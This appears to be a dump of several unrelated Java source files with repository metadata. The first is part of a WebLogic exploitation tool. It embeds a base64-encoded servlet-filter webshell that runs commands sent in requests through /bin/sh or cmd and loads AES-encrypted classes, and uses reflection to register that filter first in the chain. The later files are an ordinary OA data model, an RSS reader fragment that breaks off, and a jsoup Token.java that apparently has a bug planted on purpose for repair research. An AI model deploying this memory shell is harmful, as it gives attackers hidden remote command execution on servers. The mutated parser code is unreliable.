"yv66vgAAADIBXgoAQgCnCACoCQBdAKkIAKoJAF0AqwgArAkAXQCtCgBdAK4JAK8AsAgAsQoAsgCzCAC0CwBIALUIALYKABMAtwoAEwC4CQC5ALoIALsHALwIAL0IAL4IAHcIAL8HAMAKAMEAwgoAwQDDCgDEAMUKABgAxggAxwoAGADICgAYAMkLAEkAygoAywCzBwDMCwAiAM0LACIAzggAzwsAIgDQCADRCwDSANMIANQKANUA1gcA1wcA2AoALACnCwDSANkKACwA2ggA2woALADcCgAsAN0KABMA3goAKwDfCgDVAOAHAOEKADYApwsASADiCgDjAOQKADYA5QoA1QDmCQBdAOcIAOgHAOkHAHwHAOoKAD4A6wcA7AoA7QDuCgDtAO8KAPAA8QoAPgDyCADzBwD0BwD1BwD2CgBKAPcLAPgA+QgA+goAQAD7BwD8CgBCAP0JAP4A/wcBAAoAPgEBCAECCgDwAQMKAP4BBAcBBQoAVwD3BwEGCgBZAPcHAQcKAFsA9wcBCAcBCQEAEm15Q2xhc3NMb2FkZXJDbGF6egEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAQYmFzaWNDbWRTaGVsbFB3ZAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAE2JlaGluZGVyU2hlbGxIZWFkZXIBABBiZWhpbmRlclNoZWxsUHdkAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBADFMY29tL2ZlaWhvbmcvbGRhcC90ZW1wbGF0ZS9EeW5hbWljRmlsdGVyVGVtcGxhdGU7AQAEaW5pdAEAHyhMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7KVYBAAxmaWx0ZXJDb25maWcBABxMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7AQAKRXhjZXB0aW9ucwcBCgEACGRvRmlsdGVyAQBbKExqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTtMamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbjspVgEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAGcmVzdWx0AQADY21kAQABawEABmNpcGhlcgEAFUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEADmV2aWxDbGFzc0J5dGVzAQACW0IBAAlldmlsQ2xhc3MBAApldmlsT2JqZWN0AQASTGphdmEvbGFuZy9PYmplY3Q7AQAMdGFyZ2V0TWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAOc2VydmxldFJlcXVlc3QBAB5MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDsBAA9zZXJ2bGV0UmVzcG9uc2UBAB9MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7AQALZmlsdGVyQ2hhaW4BABtMamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbjsBAA1TdGFja01hcFRhYmxlBwC8BwB1BwD2AQAHZGVzdHJveQEACmluaXRpYWxpemUBAAJleAEAIUxqYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uOwEABWNsYXp6AQAGbWV0aG9kAQAEY29kZQEABWJ5dGVzAQAiTGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uOwEAC2NsYXNzTG9hZGVyAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBACJMamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb247AQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQAtTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25UYXJnZXRFeGNlcHRpb247BwEIBwDqBwD8BwDpBwELBwEABwEFBwEGBwEHAQAKU291cmNlRmlsZQEAGkR5bmFtaWNGaWx0ZXJUZW1wbGF0ZS5qYXZhDABlAGYBAARwYXNzDABhAGIBAAxYLU9wdGlvbnMtQWkMAGMAYgEAEGU0NWUzMjlmZWI1ZDkyNWIMAGQAYgwAjwBmBwEMDAENAQ4BAB1bK10gRHluYW1pYyBGaWx0ZXIgc2F5cyBoZWxsbwcBDwwBEAERAQAEdHlwZQwBEgETAQAFYmFzaWMMAPMBFAwBFQEWBwEXDAEYAGIBAAEvAQAQamF2YS9sYW5nL1N0cmluZwEABy9iaW4vc2gBAAItYwEAAi9DAQARamF2YS91dGlsL1NjYW5uZXIHARkMARoBGwwBHAEdBwEeDAEfASAMAGUBIQEAAlxBDAEiASMMASQBJQwBJgEnBwEoAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAwBKQETDAEqASUBAARQT1NUDAErASwBAAF1BwEtDAEuAS8BAANBRVMHATAMATEBMgEAH2phdmF4L2NyeXB0by9zcGVjL1NlY3JldEtleVNwZWMBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwBMwE0DAE1ATYBAAAMATUBNwwBOAElDAE5AToMAGUBOwwAbAE8AQAWc3VuL21pc2MvQkFTRTY0RGVjb2RlcgwBPQE+BwE/DAFAASUMAUEBQgwBQwFEDABfAGABAAtkZWZpbmVDbGFzcwEAD2phdmEvbGFuZy9DbGFzcwEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgwBRQFGAQAQamF2YS9sYW5nL09iamVjdAcBRwwBSAFJDAFKAUsHAQsMAUwBTQwBTgFPAQAGZXF1YWxzAQAcamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdAEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwBUABmBwFRDAByAVIBACdjb20uZmVpaG9uZy5sZGFwLnRlbXBsYXRlLk15Q2xhc3NMb2FkZXIMAVMBVAEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uDAFVAVYHAVcMAVgAYAEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24MAVkBVgEDHHl2NjZ2Z0FBQURJQUd3b0FCUUFXQndBWENnQUNBQllLQUFJQUdBY0FHUUVBQmp4cGJtbDBQZ0VBR2loTWFtRjJZUzlzWVc1bkwwTnNZWE56VEc5aFpHVnlPeWxXQVFBRVEyOWtaUUVBRDB4cGJtVk9kVzFpWlhKVVlXSnNaUUVBRWt4dlkyRnNWbUZ5YVdGaWJHVlVZV0pzWlFFQUJIUm9hWE1CQUNsTVkyOXRMMlpsYVdodmJtY3ZiR1JoY0M5MFpXMXdiR0YwWlM5TmVVTnNZWE56VEc5aFpHVnlPd0VBQVdNQkFCZE1hbUYyWVM5c1lXNW5MME5zWVhOelRHOWhaR1Z5T3dFQUMyUmxabWx1WlVOc1lYTnpBUUFzS0Z0Q1RHcGhkbUV2YkdGdVp5OURiR0Z6YzB4dllXUmxjanNwVEdwaGRtRXZiR0Z1Wnk5RGJHRnpjenNCQUFWaWVYUmxjd0VBQWx0Q0FRQUxZMnhoYzNOTWIyRmtaWElCQUFwVGIzVnlZMlZHYVd4bEFRQVNUWGxEYkdGemMweHZZV1JsY2k1cVlYWmhEQUFHQUFjQkFDZGpiMjB2Wm1WcGFHOXVaeTlzWkdGd0wzUmxiWEJzWVhSbEwwMTVRMnhoYzNOTWIyRmtaWElNQUE4QUdnRUFGV3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2dFQUZ5aGJRa2xKS1V4cVlYWmhMMnhoYm1jdlEyeGhjM003QUNFQUFnQUZBQUFBQUFBQ0FBQUFCZ0FIQUFFQUNBQUFBRG9BQWdBQ0FBQUFCaW9ydHdBQnNRQUFBQUlBQ1FBQUFBWUFBUUFBQUFRQUNnQUFBQllBQWdBQUFBWUFDd0FNQUFBQUFBQUdBQTBBRGdBQkFBa0FEd0FRQUFFQUNBQUFBRVFBQkFBQ0FBQUFFTHNBQWxrcnR3QURLZ01xdnJZQUJMQUFBQUFDQUFrQUFBQUdBQUVBQUFBSUFBb0FBQUFXQUFJQUFBQVFBQkVBRWdBQUFBQUFFQUFUQUE0QUFRQUJBQlFBQUFBQ0FCVT0MAVoBWwwBXAFdAQAgamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb24BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgEAL2NvbS9mZWlob25nL2xkYXAvdGVtcGxhdGUvRHluYW1pY0ZpbHRlclRlbXBsYXRlAQAUamF2YXgvc2VydmxldC9GaWx0ZXIBAB5qYXZheC9zZXJ2bGV0L1NlcnZsZXRFeGNlcHRpb24BABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAFShMamF2YS9sYW5nL09iamVjdDspWgEAB2lzRW1wdHkBAAMoKVoBAAxqYXZhL2lvL0ZpbGUBAAlzZXBhcmF0b3IBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEABG5leHQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQATamF2YS9pby9QcmludFdyaXRlcgEACWdldEhlYWRlcgEACWdldE1ldGhvZAEACmdldFNlc3Npb24BACIoKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247AQAeamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uAQAMc2V0QXR0cmlidXRlAQAnKExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvT2JqZWN0OylWAQATamF2YXgvY3J5cHRvL0NpcGhlcgEAC2dldEluc3RhbmNlAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAxnZXRBdHRyaWJ1dGUBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvT2JqZWN0OwEABmFwcGVuZAEALShMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAIZ2V0Qnl0ZXMBAAQoKVtCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYBABcoSUxqYXZhL3NlY3VyaXR5L0tleTspVgEACWdldFJlYWRlcgEAGigpTGphdmEvaW8vQnVmZmVyZWRSZWFkZXI7AQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgEACHJlYWRMaW5lAQAMZGVjb2RlQnVmZmVyAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RvRmluYWwBAAYoW0IpW0IBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAC25ld0luc3RhbmNlAQAUKClMamF2YS9sYW5nL09iamVjdDsBAA9wcmludFN0YWNrVHJhY2UBABlqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluAQBAKExqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTspVgEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBAA1nZXRTdXBlcmNsYXNzAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwAhAF0AQgABAF4ABAACAF8AYAAAAAIAYQBiAAAAAgBjAGIAAAACAGQAYgAAAAUAAQBlAGYAAQBnAAAAWQACAAEAAAAbKrcAASoSArUAAyoSBLUABSoSBrUAByq3AAixAAAAAgBoAAAAGgAGAAAAFgAEABEACgASABAAEwAWABcAGgAYAGkAAAAMAAEAAAAbAGoAawAAAAEAbABtAAIAZwAAADUAAAACAAAAAbEAAAACAGgAAAAGAAEAAAAdAGkAAAAWAAIAAAABAGoAawAAAAAAAQBuAG8AAQBwAAAABAABAHEAAQByAHMAAgBnAAAC5AAHAAoAAAGpsgAJEgq2AAsrEgy5AA0CAMYAkSsSDLkADQIAEg62AA+ZAIErKrQAA7kADQIAOgQZBMYAbRkEtgAQmgBlAToFsgAREhK2AA+ZABsGvQATWQMSFFNZBBIVU1kFGQRTOgWnABgGvQATWQMSFlNZBBIXU1kFGQRTOgW7ABhZuAAZGQW2ABq2ABu3ABwSHbYAHrYAHzoGLLkAIAEAGQa2ACGnAQorwAAiKrQABbkAIwIAxgDyK8AAIrkAJAEAEiW2AA+ZANQqtAAHOgQrwAAiuQAmAQASJxkEuQAoAwASKbgAKjoFGQUFuwArWbsALFm3AC0rwAAiuQAmAQASJ7kALgIAtgAvEjC2ADG2ADK2ADMSKbcANLYANRkFuwA2WbcANyu5ADgBALYAObYAOrYAOzoGKrQAPBI9Bb0APlkDEj9TWQQSQFO2AEEBBb0AQlkDGQZTWQS4AEO2AERTtgBFwAA+OgcZB7YARjoIGQcSRwW9AD5ZAxJIU1kEEklTtgBBOgkZCRkIBb0AQlkDK1NZBCxTtgBFV6cAFToEGQS2AEunAAstKyy5AEwDALEAAQCxAZMBlgBKAAMAaAAAAG4AGwAAACEACAAkACMAJgAvACcAPAAoAD8AKQBKACoAYgAsAHcALgCTAC8AngAxALEANADCADUAyAA2ANoANwDhADgBFQA5AS8AOgFhADsBaAA8AX8APQGTAEEBlgA/AZgAQAGdAEEBoABDAagARQBpAAAAjgAOAD8AXwB0AHUABQCTAAsAdgBiAAYALwBvAHcAYgAEAMgAywB4AGIABADhALIAeQB6AAUBLwBkAHsAfAAGAWEAMgB9AGAABwFoACsAfgB/AAgBfwAUAIAAgQAJAZgABQCCAIMABAAAAakAagBrAAAAAAGpAIQAhQABAAABqQCGAIcAAgAAAakAiACJAAMAigAAABkACP0AYgcAiwcAjBT5ACYC+wDxQgcAjQkHAHAAAAAGAAIAWQBxAAEAjgBmAAEAZwAAACsAAAABAAAAAbEAAAACAGgAAAAGAAEAAABKAGkAAAAMAAEAAAABAGoAawAAAAIAjwBmAAEAZwAAAgMABwAHAAAAqbgAQ7YAREwqKxJNtgBOtQA8pwB/TSu2AFBOAToEGQTHADMtEkKlAC0tEj0GvQA+WQMSP1NZBLIAUVNZBbIAUVO2AEE6BKf/2DoFLbYAU06n/84SVDoFuwA2WbcANxkFtgA6OgYZBAS2AFUqGQQrBr0AQlkDGQZTWQQDuABWU1kFGQa+uABWU7YARcAAPrUAPKcAGEwrtgBYpwAQTCu2AFqnAAhMK7YAXLEABQAHABEAFABPACgARQBIAFIAAACQAJMAVwAAAJAAmwBZAAAAkACjAFsAAwBoAAAAagAaAAAATgAHAFAAEQBgABQAUQAVAFIAGgBTAB0AVAAoAFYARQBZAEgAVwBKAFgATwBZAFIAXABWAF0AZABeAGoAXwCQAGcAkwBhAJQAYgCYAGcAmwBjAJwAZACgAGcAowBlAKQAZgCoAGgAaQAAAHAACwBKAAUAkACRAAUAGgB2AJIAYAADAB0AcwCTAIEABABWADoAlABiAAUAZAAsAJUAfAAGABUAewCCAJYAAgAHAIkAlwCYAAEAlAAEAIIAmQABAJwABACCAJoAAQCkAAQAggCbAAEAAACpAGoAawAAAIoAAAA6AAn/ABQAAgcAnAcAnQABBwCe/gAIBwCeBwCfBwCgagcAoQn/AD0AAQcAnAAAQgcAokcHAKNHBwCkBAABAKUAAAACAKY="; byte[] bytes = base64Decoder.decodeBuffer(codeClass); Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); method.setAccessible(true); clazz = (Class) method.invoke(cl, bytes, 0, bytes.length); } //将 Filter 注册进 FilterManager //参数: String filterName, String filterClassName, String[] urlPatterns, String[] servletNames, Map initParams, String[] dispatchers Method registerFilterMethod = filterManager.getClass().getDeclaredMethod("registerFilter", String.class, String.class, String[].class, String[].class, Map.class, String[].class); registerFilterMethod.setAccessible(true); registerFilterMethod.invoke(filterManager, filterName, "com.feihong.ldap.template.DynamicFilterTemplate", new String[]{urlPattern}, null, null, null); //将我们添加的 Filter 移动到 FilterChian 的第一位 Field filterPatternListField = filterManager.getClass().getDeclaredField("filterPatternList"); filterPatternListField.setAccessible(true); ArrayList filterPatternList = (ArrayList)filterPatternListField.get(filterManager); //不能用 filterName 来判断,因为在 11g 中此值为空,在 12g 中正常 for(int i = 0; i < filterPatternList.size(); i++){ Object filterPattern = filterPatternList.get(i); Field f = filterPattern.getClass().getDeclaredField("map"); f.setAccessible(true); ServletMapping mapping = (ServletMapping) f.get(filterPattern); f = mapping.getClass().getSuperclass().getDeclaredField("matchMap"); f.setAccessible(true); MatchMap matchMap = (MatchMap)f.get(mapping); Object result = matchMap.match(urlPattern); if(result != null && result.toString().contains(urlPattern)){ Object temp = filterPattern; filterPatternList.set(i, filterPatternList.get(0)); filterPatternList.set(0, temp); break; } } } } } }catch(Exception e){ //pass } } }catch (Exception e){ e.printStackTrace(); } } @Override public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { } @Override public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { } }
[ "huangfeihong-cs@163.com" ]
huangfeihong-cs@163.com
bfe16de83df8068b3705f9711754de5b7f222960
20eb62855cb3962c2d36fda4377dfd47d82eb777
/newEvaluatedBugs/Jsoup_48_buggy/mutated/254/Token.java
72373991db0c2c70cc158c2765f40d769f88ba66
[]
no_license
ozzydong/CapGen
356746618848065cce4e253e5d3c381baa85044a
0ba0321b6b1191443276021f1997833342f02515
refs/heads/master
2023-03-18T20:12:02.923428
2020-08-21T03:08:28
2020-08-21T03:08:28
null
0
0
null
null
null
null
UTF-8
Java
false
false
5,879
java
package org.jsoup.parser; import org.jsoup.helper.Validate; import org.jsoup.nodes.Attribute; import org.jsoup.nodes.Attributes; /** * Parse tokens for the Tokeniser. */ abstract class Token { TokenType type; private Token() { } static class Doctype extends Token { final StringBuilder name = new StringBuilder(); final StringBuilder publicIdentifier = new StringBuilder(); final StringBuilder systemIdentifier = new StringBuilder(); boolean forceQuirks = false; Doctype() { type = TokenType.Doctype; } String getName() { return name.toString(); } String getPublicIdentifier() { return publicIdentifier.toString(); } public String getSystemIdentifier() { return systemIdentifier.toString(); } public boolean isForceQuirks() { return forceQuirks; } } static abstract class Tag extends Token { protected String tagName; private String pendingAttributeName; private String pendingAttributeValue; boolean selfClosing = false; Attributes attributes = new Attributes(); // todo: allow nodes to not have attributes void newAttribute() { if (pendingAttributeName != null) { if (pendingAttributeValue == null) pendingAttributeValue = ""; Attribute attribute = new Attribute(pendingAttributeName, pendingAttributeValue); attributes.put(attribute); } pendingAttributeName = null; pendingAttributeValue = null; } void finaliseTag() { // finalises for emit if (pendingAttributeName != null) { // todo: check if attribute name exists; if so, drop and error newAttribute(); } } String name() { Validate.isFalse(tagName.length() == 0); return tagName; } Tag name(String name) { tagName = name; return this; } boolean isSelfClosing() { return selfClosing; } @SuppressWarnings({"TypeMayBeWeakened"}) Attributes getAttributes() { return attributes; } // these appenders are rarely hit in not null state-- caused by null chars. void appendTagName(String append) { tagName = tagName == null ? append : tagName.concat(append); } void appendTagName(char append) { appendTagName(String.valueOf(append)); } void appendAttributeName(String append) { pendingAttributeName = pendingAttributeName == null ? append : pendingAttributeName.concat(append); } void appendAttributeName(char append) { appendAttributeName(String.valueOf(append)); } void appendAttributeValue(String append) { pendingAttributeValue = pendingAttributeValue == null ? pendingAttributeName : pendingAttributeValue.concat(append); } void appendAttributeValue(char append) { appendAttributeValue(String.valueOf(append)); } } static class StartTag extends Tag { StartTag() { super(); type = TokenType.StartTag; } StartTag(String name) { this(); this.tagName = name; } StartTag(String name, Attributes attributes) { this(); this.tagName = name; this.attributes = attributes; } @Override public String toString() { return "<" + name() + " " + attributes.toString() + ">"; } } static class EndTag extends Tag{ EndTag() { super(); type = TokenType.EndTag; } EndTag(String name) { this(); this.tagName = name; } @Override public String toString() { return "</" + name() + " " + attributes.toString() + ">"; } } static class Comment extends Token { final StringBuilder data = new StringBuilder(); Comment() { type = TokenType.Comment; } String getData() { return data.toString(); } @Override public String toString() { return "<!--" + getData() + "-->"; } } static class Character extends Token { private final String data; Character(String data) { type = TokenType.Character; this.data = data; } String getData() { return data; } @Override public String toString() { return getData(); } } static class EOF extends Token { EOF() { type = Token.TokenType.EOF; } } boolean isDoctype() { return type == TokenType.Doctype; } Doctype asDoctype() { return (Doctype) this; } boolean isStartTag() { return type == TokenType.StartTag; } StartTag asStartTag() { return (StartTag) this; } boolean isEndTag() { return type == TokenType.EndTag; } EndTag asEndTag() { return (EndTag) this; } boolean isComment() { return type == TokenType.Comment; } Comment asComment() { return (Comment) this; } boolean isCharacter() { return type == TokenType.Character; } Character asCharacter() { return (Character) this; } boolean isEOF() { return type == TokenType.EOF; } enum TokenType { Doctype, StartTag, EndTag, Comment, Character, EOF } }
[ "justinwm@163.com" ]
justinwm@163.com
00b5de37b4b6d131abff52adeb559c62f0aca9dd
26ea34b8dbde091e9c2e3e75909fa00181650e47
/src/net/wicp/yunjigroup/oa/models/HomeData.java
10c2db6e98499c948665970f477163c3570020b4
[]
no_license
Comori/COA
d876d4959bc92976e07c02f8714a550fd1d7bf2f
3171e5bea9a50e56b057c5daa6a8883c046a85c9
refs/heads/master
2021-01-13T01:23:40.960263
2014-11-17T09:27:28
2014-11-17T09:27:28
null
0
0
null
null
null
null
UTF-8
Java
false
false
2,743
java
package net.wicp.yunjigroup.oa.models; import org.json.JSONObject; public class HomeData extends BaseData{ /*{ "message_count": "858", "notice_count": 0, "workflow_count": "562", "meeting_count": "0", "address_count": "1035", "error": "\u53c2\u6570\u4f20\u9012\u9519\u8bef" }*/ //服务器返回的字段名 public static final String KEY_MESSAGE_COUNT = "message_count"; public static final String KEY_NOTICE_COUNT = "notice_count"; public static final String KEY_WORKFLOW_COUNT = "workflow_count"; public static final String KEY_MEETING_COUNT = "meeting_count"; public static final String KEY_ADDRESS_COUNT = "address_count"; private static final long serialVersionUID = 1456457L; private int messageCount = 0; private int noticeCount = 0; private int workflowCount = 0; private int meetingCount = 0; private int addressCount = 0; public int getMessageCount() { return messageCount; } public void setMessageCount( int messageCount ) { this.messageCount = messageCount; } public int getNoticeCount() { return noticeCount; } public void setNoticeCount( int noticeCount ) { this.noticeCount = noticeCount; } public int getWorkflowCount() { return workflowCount; } public void setWorkflowCount( int workflowCount ) { this.workflowCount = workflowCount; } public int getMeetingCount() { return meetingCount; } public void setMeetingCount( int meetingCount ) { this.meetingCount = meetingCount; } public int getAddressCount() { return addressCount; } public void setAddressCount( int addressCount ) { this.addressCount = addressCount; } @Override public String toString() { return "HomeData [messageCount=" + messageCount + ", noticeCount=" + noticeCount + ", workflowCount=" + workflowCount + ", meetingCount=" + meetingCount + ", addressCount=" + addressCount + "]"; } public static HomeData fromJson(JSONObject jsonObject){ if(jsonObject == null) return null; HomeData homeData = new HomeData(); homeData.setAddressCount(jsonObject.optInt(KEY_ADDRESS_COUNT)); homeData.setError(jsonObject.optString(KEY_ERROR)); homeData.setMeetingCount(jsonObject.optInt(KEY_MEETING_COUNT)); homeData.setNoticeCount(jsonObject.optInt(KEY_NOTICE_COUNT)); homeData.setWorkflowCount(jsonObject.optInt(KEY_WORKFLOW_COUNT)); homeData.setMessageCount(jsonObject.optInt(KEY_MESSAGE_COUNT)); return homeData; } }
[ "chenqiang5@staff.sina.com.cn" ]
chenqiang5@staff.sina.com.cn
dff15a0c6e6f11605fe6c4a129d145eece3669f0
ed1e97314b25d294f091394b259b9e2e12b940b3
/app/src/main/java/com/ictnews/ongtien/rssnews/PagerFragment.java
65da9ab1473f3ee304b4ad10e02ee4cd4dfedb9b
[]
no_license
Lokyluck/RssNews
001ec63af0f40c68035d457f816143f1306aafab
d3904e8876d28f95ed4f2802166d20015a2669fb
refs/heads/master
2021-08-31T06:07:07.477891
2017-12-20T13:55:55
2017-12-20T13:55:55
null
0
0
null
null
null
null
UTF-8
Java
false
false
8,666
java
package com.ictnews.ongtien.rssnews; import android.app.Activity; import android.os.AsyncTask; import android.os.Bundle; import android.support.annotation.Nullable; import android.support.v4.widget.SwipeRefreshLayout; import android.support.v4.app.Fragment; import android.support.v7.widget.LinearLayoutManager; import android.support.v7.widget.RecyclerView; import android.text.TextUtils; import android.util.Log; import android.util.Xml; import android.view.LayoutInflater; import android.view.View; import android.view.ViewGroup; import android.widget.TextView; import org.jsoup.Jsoup; import org.jsoup.nodes.Document; import org.jsoup.nodes.Element; import org.xmlpull.v1.XmlPullParser; import org.xmlpull.v1.XmlPullParserException; import java.io.IOException; import java.io.InputStream; import java.net.HttpURLConnection; import java.net.URL; import java.util.ArrayList; import java.util.List; import static android.view.View.GONE; /** * Created by TNT on 11/6/2017. * */ public class PagerFragment extends Fragment { private String UrlLink; SwipeRefreshLayout mSwipeRefreshLayout; private TextView connectStatus_TextView; private RecyclerView mRecycleView; private Activity mActivity; private List<RssFeedModel> mFeedModelList; // Store instance variables public static PagerFragment newInstance(String url){ PagerFragment mPagerFragment = new PagerFragment(); Bundle args = new Bundle(); args.putString("url", url); mPagerFragment.setArguments(args); return mPagerFragment; } @Override public void onCreate(@Nullable Bundle savedInstanceState) { super.onCreate(savedInstanceState); mActivity = getActivity(); UrlLink = getArguments().getString("url"); } @Nullable @Override public View onCreateView(LayoutInflater inflater, @Nullable ViewGroup container, Bundle savedInstanceState) { View rootView = inflater.inflate(R.layout.pager_fragment, container, false); //variables mRecycleView = (RecyclerView) rootView.findViewById(R.id.recyclerView); mRecycleView.setLayoutManager(new LinearLayoutManager(this.getActivity())); mSwipeRefreshLayout = (SwipeRefreshLayout) rootView.findViewById(R.id.swipeRefreshLayout); connectStatus_TextView = (TextView) rootView.findViewById(R.id.connect_status_text); //check Network connection if (Utils.IsConnected(mActivity)){ connectStatus_TextView.setVisibility(GONE); new FetchFeedTask().execute(); } else showTextDisconnect(); mSwipeRefreshLayout.setOnRefreshListener(new SwipeRefreshLayout.OnRefreshListener() { @Override public void onRefresh() { if (Utils.IsConnected(mActivity)) { connectStatus_TextView.setVisibility(GONE); new FetchFeedTask().execute(); } else { showTextDisconnect(); mSwipeRefreshLayout.setRefreshing(false); } } }); return rootView; } //method show text "no internet connection" private void showTextDisconnect(){ connectStatus_TextView.setVisibility(View.VISIBLE); connectStatus_TextView.setText(R.string.noInternetConnection); } class FetchFeedTask extends AsyncTask<Void, Void, Boolean> { FetchFeedTask(){ } @Override protected void onPreExecute() { mSwipeRefreshLayout.setRefreshing(true); } @Override protected Boolean doInBackground(Void... voids) { if (TextUtils.isEmpty(UrlLink)){ return false; } HttpURLConnection urlConnection; try { if (!UrlLink.startsWith("http://") && !UrlLink.startsWith("https://")) UrlLink = "http://" + UrlLink; Log.i("TRY_CATCH", "UrlLink2 " + UrlLink); URL url = new URL(UrlLink); urlConnection = (HttpURLConnection) url.openConnection(); urlConnection.setRequestMethod("GET"); urlConnection.connect(); InputStream inputStream = url.openConnection().getInputStream(); if (inputStream != null) mFeedModelList = parseFeed(inputStream); return true; } catch (IOException | XmlPullParserException e){ Log.e("DO_IN_BACK_GROUND", "Error", e); return false; } } @Override protected void onPostExecute(Boolean success) { mSwipeRefreshLayout.setRefreshing(false); if (success){ RssFeedListAdapter adapter = new RssFeedListAdapter(mFeedModelList, mActivity); mRecycleView.setAdapter(adapter); } else{ connectStatus_TextView.setVisibility(View.VISIBLE); connectStatus_TextView.setText(R.string.FailToLoadData); } } //method which parsing XML data and return List of item private List<RssFeedModel> parseFeed(InputStream inputstream) throws XmlPullParserException, IOException { //parse XML data Element ImageElement; String title = null; String link = null; String description = null; String thumbnailUrl = null; boolean isItem = false; int isItemFlag = 0; ArrayList<RssFeedModel> itemsList = new ArrayList<>(); try{ XmlPullParser xmlPullParser = Xml.newPullParser(); xmlPullParser.setFeature(XmlPullParser.FEATURE_PROCESS_NAMESPACES, false); xmlPullParser.setInput(inputstream, null); xmlPullParser.nextTag(); int eventType = 0; while 